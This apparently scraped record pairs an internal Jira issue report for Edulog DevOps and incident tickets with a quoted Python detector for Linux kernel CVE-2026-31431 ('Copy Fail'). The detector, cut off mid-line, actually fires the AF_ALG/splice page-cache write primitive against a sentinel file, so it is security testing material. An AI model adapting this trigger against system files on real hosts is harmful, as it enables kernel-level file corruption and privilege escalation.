.tab:hover:not(.active){background:var(--bg2)}\n  .legend{display:flex;gap:14px;flex-wrap:wrap;margin-bottom:1rem;font-size:11px;color:var(--tx2);align-items:center}\n  .li{display:flex;align-items:center;gap:4px}\n  .ld{width:9px;height:9px;border-radius:2px}\n  .summary-grid{display:grid;grid-template-columns:repeat(3,minmax(0,1fr));gap:8px;margin-bottom:1.25rem}\n  .metric{background:var(--bg2);border-radius:var(--r);padding:10px 12px}\n  .ml{font-size:11px;color:var(--tx2);margin-bottom:3px}\n  .mv{font-size:20px;font-weight:500}\n  .project-block{margin-bottom:1.1rem;border:0.5px solid var(--bdr);border-radius:var(--rl);overflow:hidden}\n  .ph{padding:9px 14px;border-bottom:0.5px solid var(--bdr);display:flex;align-items:center;justify-content:space-between}\n  .pn{font-size:13px;font-weight:500}\n  .pm{font-size:11px;color:var(--tx2)}\n  .th{padding:5px 14px;font-size:11px;font-weight:500;color:var(--tx2);background:var(--bg2);display:flex;align-items:center;gap:6px;border-top:0.5px solid var(--bdr)}\n  .tc{background:var(--bg3);color:var(--tx2);padding:1px 6px;border-radius:var(--r);font-size:10px}\n  .cols{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:4px 14px;font-size:10px;color:var(--tx3);background:var(--bg2);border-top:0.5px solid var(--bdr)}\n  .ir{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:6px 14px;align-items:start;border-top:0.5px solid var(--bdr);font-size:11px}\n  .ir.stale{background:rgba(250,238,218,0.3)}\n  .ir.highest{background:rgba(252,235,235,0.35)}\n  .ir.overdue{background:rgba(252,235,235,0.45)}\n  .ir.stale.highest,.ir.stale.overdue{background:rgba(250,220,200,0.45)}\n  @media(prefers-color-scheme:dark){\n    .ir.stale{background:rgba(99,56,6,0.2)}.ir.highest{background:rgba(121,31,31,0.2)}\n    .ir.overdue{background:rgba(121,31,31,0.3)}.ir.stale.highest,.ir.stale.overdue{background:rgba(110,40,6,0.28)}\n  }\n  .ik{color:var(--info);font-size:10px;font-family:var(--mono);white-space:nowrap;text-decoration:none}\n  .ik:hover{text-decoration:underline}\n  .is{color:var(--tx);line-height:1.4;overflow:hidden;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}\n  .ia{color:var(--tx2);font-size:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}\n  .dt{font-size:10px;white-space:nowrap}\n  .upd-ok{color:var(--tx2)}.upd-stale{color:#BA7517;font-weight:500}\n  .due-ok{color:var(--tx2)}.due-over{color:#A32D2D;font-weight:500}\n  .cr{color:var(--tx2)}\n  @media(prefers-color-scheme:dark){.upd-stale{color:#FAC775}.due-over{color:#F7C1C1}}\n  .dot-h{display:inline-block;width:5px;height:5px;border-radius:50%;background:#E24B4A;margin-right:2px;vertical-align:middle}\n  .dot-s{display:inline-block;width:5px;height:5px;border-radius:50%;background:#EF9F27;margin-right:2px;vertical-align:middle}\n  .dot-d{display:inline-block;width:5px;height:5px;border-radius:50%;background:#D85A30;margin-right:2px;vertical-align:middle}\n  .sb{font-size:10px;padding:2px 6px;border-radius:var(--r);text-align:center;white-space:nowrap}\n  .s-ip{background:#FAEEDA;color:#854F0B}.s-td{background:#E1F5EE;color:#0F6E56}\n  .s-oi{background:#FCEBEB;color:#A32D2D}.s-xx{background:var(--bg2);color:var(--tx2)}\n  @media(prefers-color-scheme:dark){\n    .s-ip{background:#633806;color:#FAC775}.s-td{background:#085041;color:#9FE1CB}.s-oi{background:#791F1F;color:#F7C1C1}\n  }\n  .empty{padding:16px;text-align:center;color:var(--tx3);font-size:12px}\n  .footer{font-size:11px;color:var(--tx3);margin-top:24px}\n\n\n\n\nJira Active Issues Report \u2014 DO / IM / S2\n\nGenerated May 06, 2026 at 03:26 PM  \u00b7  Excludes Done, Fixed, Canceled, Deferred  \u00b7  https://karrostech.atlassian.net\n\nLast 24 hrs24\u201348 hrs ago2\u20137 days agoOlder than 7 days\n\n\n  Highest priority\n  Stale \u22655 business days\n  Due date missed\n\n\n\n\n\nDO \u2014 Edulog DevOps\n1\n\nIM \u2014 Incident Management\n4\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                1 active issue\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 1\n                    \n\n                      DO-2042\n                      Client Cancelation for Kuna Joint School District, ID - May 29 shutdown\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      On hold\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                4 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 3\n                    \n\n                      IM-7574\n                      Gwinnett, GA - Missing Data in Telematics\n                      Josiah Brown\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7573\n                      Brunswick County, NC - APP Issues\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7571\n                      Cleveland, OH - Client Reported Delays in Both Telematics and with Parent Portal Messages this Morning\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \nTask 1\n                    \n\n                      IM-7572\n                      Framingham Public Schools, GPS units not reporting in since 11:30 AM today\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n2\n\nIM \u2014 Incident Management\n1\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                2 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 2\n                    \n\n                      DO-2041\n                      Remove the test server - fr-routing-legacy-test  it is no longer needed.\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2040\n                      Remove queuedNotification lambda function when associated NotificationService changes are deployed\n                      \u2014\n                      May 4, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                1 active issue\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 1\n                    \n\n                      IM-7569\n                      Zonar - Delay / Omission of pings to SM, PP\n                      Nick Sundberg\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n10\n\nIM \u2014 Incident Management\n14\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                10 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 2\n                    \n\n                      DO-2034\n                      DP V2 (build 180/AV1): EDP gateway /v4.0/vehicles/search returns 0 vehicles for development-test-school tenant\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2033\n                      DP V2 (build 180/AV1): POST /apilive/setting/event/add returns 500 after login (tenantId='', deviceId=0)\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \nStory 1\n                    \n\n                      DO-2025\n                      Birdville, TX - Please deploy Telematics\n                      Cory Emlen\n                      Apr 29, '26\n                      May 6, '26\n                      \u2014\n                      IN PROGRESS\n                    \nTask 7\n                    \n\n                      DO-2037\n                      Deploy Hafeez's Data Build Tool\n                      Boluwatife Olaifa\n                      May 4, '26\n                      May 6, '26\n                      May 4, '26\n                      Backlog\n                    \n                    \n\n                      DO-2032\n                      Need script run on Cobb to remove duplicate locations\n                      Vader\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-2028\n                      All legacy PP ingestions have not run:\n                      Josiah Brown\n                      May 1, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2027\n                      Patch infra with CopyFail (CVE-2026-31431)\n                      Josiah Brown\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2026\n                      Johnston NC Demo Site down\n                      Vader\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-2024\n                      Review all deployments, evaluate setting limits\n                      Josiah Brown\n                      Apr 29, '26\n                      Apr 29, '26 (5d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2023\n                      Testing Release Servers\n                      \u2014\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                14 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 14\n                    \n\n                      IM-7567\n                      Fayette County, no bus event update since 4/29\n                      \u2014\n                      May 1, '26\n                      May 6, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7564\n                      Knox, TN - Gps units not reporting in since yesterday\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7563\n                       West Shore - Parent Portal not working\n                      Brandon Donnelson\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7561\n                      Denton, TX - Parent Portal App is not tracking buses\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7560\n                      Suffolk, call from parent experiencing tracking issues.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7559\n                      New Kent, parent portal not tracking\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7557\n                      New Hanover, Parent portal  tracking issues\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7556\n                      Jefferson, parent portal not tracking \n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7555\n                      Elyria-OH ,Parent Portal App don't track the bus.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7554\n                      Peoria, AZ - Parent Portal Down\n                      Brandon Donnelson\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7553\n                      Stanfield, AZ's Parent Portal is not working as of this morning.  Last reading 4:16am.  \n                      \u2014\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Blocker\n                    \n                    \n\n                      IM-7551\n                      SM Can't Send Messages to PP/PPL\n                      Boluwatife Olaifa\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7550\n                      Cleveland, OH - Not able to track buses - GPS tracking down\n                      Kehinde Metibemu\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7548\n                      Cobb County, GA - Severely Degraded Athena Performance\n                      Brandon Donnelson\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n50\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                50 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nATH New site request 1\n                    \n\n                      DO-1787\n                      Elyria, OH - Athena Conversion from Legacy\n                      Cory Emlen\n                      Mar 17, '26\n                      Apr 30, '26\n                      Apr 17, '26\n                      Blocked\n                    \nBug 49\n                    \n\n                      DO-1905\n                      Parent Portal missing route/vehicle data after EKS 1.34 upgrade \u2014 missed cron sync + Hibernate 6 bug\n                      \u2014\n                      Apr 6, '26\n                      Apr 6, '26 (22d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1855\n                      There is no data available in Route assignment, Live substitution modules of Telematcis for Johnston site\n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1854\n                      There is no data available in multiple pages like Students, Runs, Routes modules of Routing for Johnston site \n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1842\n                      EDTA service missing MongoDB JVM args \u2014 broken on 57 production tenants\n                      \u2014\n                      Mar 25, '26\n                      Mar 25, '26 (30d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1801\n                      release-2-fr - Elastic search error displays into log - Unable to search for stop locations\n                      \u2014\n                      Mar 19, '26\n                      Mar 19, '26 (34d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1786\n                      [EastAllen, IN 1.78 Smoke]CA Result CSV \u2013 Export fails for valid dates with 400 Bad Request (invalid page number)\n                      Dane Elwood\n                      Mar 17, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      Blocked\n                    \n                    \n\n                      DO-1785\n                      [EastAllen, IN 1.78 Smoke]Vehicles \u2013 Seating Configuration popup shows error \u201cnetwork issues\u201d due to backend API failure\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1784\n                      [Lake Superior 1.78 Smoke]Time & Attendance module not opening from main dashboard\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1783\n                      Config API is failing for Time & Attendance module in Collinsville site \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1782\n                      Several API calls are failed in ultilities --> Employee Import and Queue Priority modules \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1779\n                      [Cleveland -1.78] [Time & attendance][Absence Record] Data preview is not available\n                      Josiah Brown\n                      Mar 16, '26\n                      Mar 16, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1776\n                      Routes API CORS Blocked & Gateway Timeout on Routes Management Page\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 15, '26 (38d)\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-1775\n                      [Chicago-1.78] [Telematics --> Edulog standard reports] - Unable to select date range for AM on time report\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 13, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1768\n                      [moorhead 1.78.0] [Telematics] [Vehicle Plan Error] Front end error for Vehicle on Route Historical view\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 16, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1767\n                      500 Internal Server Error on Athena Routing Screen \u2013 eligibilities API\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1766\n                      [Helena] API call fails on clicking \"Add New\" Student \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1765\n                      Deleting a student without entering any data in Add student form is giving 405 error \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 27, '26 (28d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1761\n                       is displayed against a checkbox on Custom transportation Needs \n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1760\n                      Pick A Location - External address return as the SA\" is failing because the \"Pick A Location\" button cannot be located on the page, preventing test execution.\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1759\n                      [Chief Leschi-1.78][Reports] [User defined Reports] Unable to create a new report template\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 31, '26 (26d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1758\n                      API returns 500 error when sending IN filter with empty values array in search request\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1757\n                      Stops/Checkpoints \u2013 Map not displayed in \u201cPick A Location\u201d popup when using Relocate\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1756\n                      [Chief Leschi-1.78] Created date is not same when downloaded a report\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1755\n                      Data Management \u2013 Map fails to load across multiple modules\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1754\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with CA Reports\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1753\n                      Students \u2013 Student picture API returning 404 Not Found when opening student record\n                      Josiah Brown\n                      Mar 12, '26\n                      Apr 6, '26 (22d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1752\n                      Students \u2013 Address parsing APIs (type, prefix, suffix) returning 500 Internal Server Error in background requests\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1751\n                      Students \u2013 Opening student record triggers \"Error parsing address\" popup and address standardization API returns 500\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1749\n                      Historical changes API is returning 500 Internal server error on Vehicle on routes in Telamatics\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1615\n                      Payroll Data is not available/displaying\n                      \u2014\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1614\n                      Data is not Visible for Default Working Hours in Employees under Data Management\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1613\n                      UDF Tab is not Displayed in Employee Information Page\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1611\n                      RPO \u2013 OPT actions failure\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1610\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with Stops details\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1608\n                      Location search fails with 504 Gateway Timeout when adding a new Stop\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1606\n                      Student Needs dialogs shows formatting issues and invalid \u201c504\u201d need option\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1594\n                      [Foundations] 404 error on Students detail page\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1591\n                      Web Query not configured for aldine-tx\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1579\n                      [Support][1.78] [Telematics] -- Error on FE Live Subs\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 9, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1578\n                      [Support-Site-1.78] 500 internal server error for \"eligibilities\"call\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1577\n                      [Training][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 30, '26 (27d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1575\n                      [Manitouspring][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 9, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1572\n                      [Manitouspring][1.78] Audit Logs: Unknown has been shown for many logs in users column\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1570\n                      500 err on cancel report API\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1569\n                      API Timesout - Endless Spinning Wheel Issue\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1562\n                      API times out/ when searching with keywords for location in Pick a Location Popup [smoke/hemet]\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1558\n                      [Houston-1.780] [Mapping] Console Error\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1556\n                      Home Page - Telematics module not displayed on Home Page\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1555\n                      [Houston-1.780] 500 internal server error for \"search\"call inside stop module\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n\nData sourced live from Jira on May 06, 2026 at 03:26 PM.\n\nfunction showTab(key,el){\n  document.querySelectorAll('.tab').forEach(t=>t.classList.remove('active'));\n  el.classList.add('active');\n  document.querySelectorAll('.pane').forEach(p=>p.style.display='none');\n  document.getElementById('pane-'+key).style.display='block';\n}\n\n\n", "creation_timestamp": "2026-05-06T15:26:34.000000Z"}, {"uuid": "2f7e14b3-c894-4eb5-8587-7b005929b161", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Deemasta/663a32c808164adcacfa7e0877e5198e", "content": "#!/usr/bin/env python3\n# CVE-2026-31431 (\"Copy Fail\") vulnerability detector.\n#\n# Attempts to trigger the algif_aead / authencesn page-cache scratch-write\n# primitive against a user-owned sentinel file in a temp directory. If the\n# scratch write lands inside the spliced page-cache page, the file's contents\n# (as observed via a fresh read) will contain the marker bytes.\n#\n# SAFE BY DESIGN\n#   * Operates on a sentinel file the running user just created. /usr/bin/su\n#     and other system binaries are NOT touched.\n#   * Page-cache corruption is in-memory only; nothing is written back to disk.\n#   * Exit 0 = NOT vulnerable, 2 = VULNERABLE, 1 = test error.\n#\n# Use only on hosts you own or are explicitly authorized to test.\n\nimport errno\nimport os\nimport socket\nimport struct\nimport sys\nimport tempfile\n\nAF_ALG                    = 38\nSOL_ALG                   = 279\nALG_SET_KEY               = 1\nALG_SET_IV                = 2\nALG_SET_OP                = 3\nALG_SET_AEAD_ASSOCLEN     = 4\nALG_OP_DECRYPT            = 0\nCRYPTO_AUTHENC_KEYA_PARAM = 1   # rtattr type from \n\nALG_NAME = \"authencesn(hmac(sha256),cbc(aes))\"\nPAGE     = 4096\nASSOCLEN = 8     # SPI(4) || seqno_lo(4)\nCRYPTLEN = 16    # one AES block\nTAGLEN   = 16    # truncated HMAC-SHA256\nMARKER   = b\"PWND\"\n\n\ndef build_authenc_keyblob(authkey: bytes, enckey: bytes) -> bytes:\n    # struct rtattr { u16 rta_len; u16 rta_type } || __be32 enckeylen || keys\n    rtattr   = struct.pack(\"HH\", 8, CRYPTO_AUTHENC_KEYA_PARAM)\n    keyparam = struct.pack(\">I\", len(enckey))\n    return rtattr + keyparam + authkey + enckey\n\n\ndef precheck() -> str | None:\n    if not os.path.exists(\"/proc/crypto\"):\n        return \"/proc/crypto missing\"\n    try:\n        socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0).close()\n    except OSError as e:\n        return f\"AF_ALG socket family unavailable ({e.strerror})\"\n    try:\n        s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)\n        s.bind((\"aead\", ALG_NAME))\n        s.close()\n    except OSError as e:\n        return f\"{ALG_NAME!r} cannot be instantiated ({e.strerror})\"\n    return None\n\n\ndef attempt_trigger(target_path: str) -> tuple[bool, bytes]:\n    sentinel = (b\"COPYFAIL-SENTINEL-UNCORRUPTED!!\\n\" * (PAGE // 32))[:PAGE]\n    with open(target_path, \"wb\") as f:\n        f.write(sentinel)\n\n    # Populate page cache.\n    fd_target = os.open(target_path, os.O_RDONLY)\n    os.read(fd_target, PAGE)\n    os.lseek(fd_target, 0, os.SEEK_SET)\n\n    # Master socket: bind + key.\n    master = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)\n    master.bind((\"aead\", ALG_NAME))\n    master.setsockopt(\n        SOL_ALG, ALG_SET_KEY,\n        build_authenc_keyblob(b\"\\x00\" * 32, b\"\\x00\" * 16),\n    )\n    op, _ = master.accept()\n\n    # Per-op parameters travel as control messages on sendmsg, not setsockopt.\n    # AAD bytes 4..7 are seqno_lo - the value the buggy scratch-write copies\n    # into dst[assoclen + cryptlen]. We pick MARKER so corruption is obvious.\n    aad = b\"\\x00\" * 4 + MARKER\n    cmsg = [\n        (SOL_ALG, ALG_SET_OP,            struct.pack(\"I\", ALG_OP_DECRYPT)),\n        (SOL_ALG, ALG_SET_IV,            struct.pack(\"I\", 16) + b\"\\x00\" * 16),\n        (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack(\"I\", ASSOCLEN)),\n    ]\n    op.sendmsg([aad], cmsg, socket.MSG_MORE)\n\n    # Splice CRYPTLEN+TAGLEN bytes of the target's page-cache page into the\n    # op socket. Because algif_aead runs in-place (req->dst = req->src), those\n    # page-cache pages now sit in the destination scatterlist.\n    pr, pw = os.pipe()\n    try:\n        n = os.splice(fd_target, pw, CRYPTLEN + TAGLEN, offset_src=0)\n        if n != CRYPTLEN + TAGLEN:\n            raise RuntimeError(f\"splice file->pipe short: {n}\")\n        n = os.splice(pr, op.fileno(), n)\n        if n != CRYPTLEN + TAGLEN:\n            raise RuntimeError(f\"splice pipe->op short: {n}\")\n    except OSError as e:\n        os.close(pr); os.close(pw)\n        op.close(); master.close(); os.close(fd_target)\n        if e.errno in (errno.EOPNOTSUPP, errno.ENOTSUP):\n            raise RuntimeError(\n                \"splice into AF_ALG socket not supported on this kernel - \"\n                \"the page-cache attack vector is not reachable here\"\n            ) from e\n        raise\n\n    # Drive the algorithm. Auth check will fail (we sent zero ciphertext+tag);\n    # EBADMSG is fine - the scratch write fires before/independent of verify.\n    try:\n        op.recv(ASSOCLEN + CRYPTLEN + TAGLEN)\n    except OSError as e:\n        if e.errno not in (errno.EBADMSG, errno.EINVAL):\n            raise\n\n    op.close()\n    master.close()\n    os.close(pr)\n    os.close(pw)\n\n    # Read back via the existing fd (page cache, not disk).\n    os.lseek(fd_target, 0, os.SEEK_SET)\n    after = os.read(fd_target, PAGE)\n    os.close(fd_target)\n\n    return after, sentinel\n\n\ndef kernel_in_affected_line() -> bool:\n    # Per the disclosure, fixes landed on the 6.12, 6.17 and 6.18 stable lines.\n    rel = os.uname().release.split(\"-\")[0]\n    parts = rel.split(\".\")\n    try:\n        major, minor = int(parts[0]), int(parts[1])\n    except (ValueError, IndexError):\n        return False\n    return (major, minor) >= (6, 12)\n\n\ndef main() -> int:\n    print(f\"[*] CVE-2026-31431 detector  kernel={os.uname().release}  \"\n          f\"arch={os.uname().machine}\")\n    if not kernel_in_affected_line():\n        print(f\"[i] Kernel {os.uname().release} predates the affected \"\n              f\"6.12/6.17/6.18 lines; trigger may not apply even if \"\n              f\"prerequisites match.\")\n\n    reason = precheck()\n    if reason:\n        print(f\"[+] Precondition not met ({reason}). NOT vulnerable.\")\n        return 0\n    print(f\"[+] AF_ALG + {ALG_NAME!r} loadable - precondition met.\")\n\n    tmp = tempfile.mkdtemp(prefix=\"copyfail-\")\n    target = os.path.join(tmp, \"sentinel.bin\")\n    try:\n        after, sentinel = attempt_trigger(target)\n    except Exception as e:\n        print(f\"[!] Trigger failed: {type(e).__name__}: {e}\")\n        return 1\n    finally:\n        try:\n            os.remove(target)\n            os.rmdir(tmp)\n        except OSError:\n            pass\n\n    # The exact landing offset of the 4-byte scratch write depends on how\n    # the source/destination scatterlists are laid out by algif_aead for this\n    # combination of inline-AAD + spliced-page input. What's invariant is that\n    # the 4 bytes from AAD seqno_lo (our marker) appear somewhere in the page,\n    # AND the marker is not present in the original sentinel.\n    marker_off  = after.find(MARKER)\n    marker_orig = sentinel.find(MARKER)\n    diffs       = [i for i in range(PAGE) if after[i] != sentinel[i]]\n\n    if marker_off >= 0 and marker_orig < 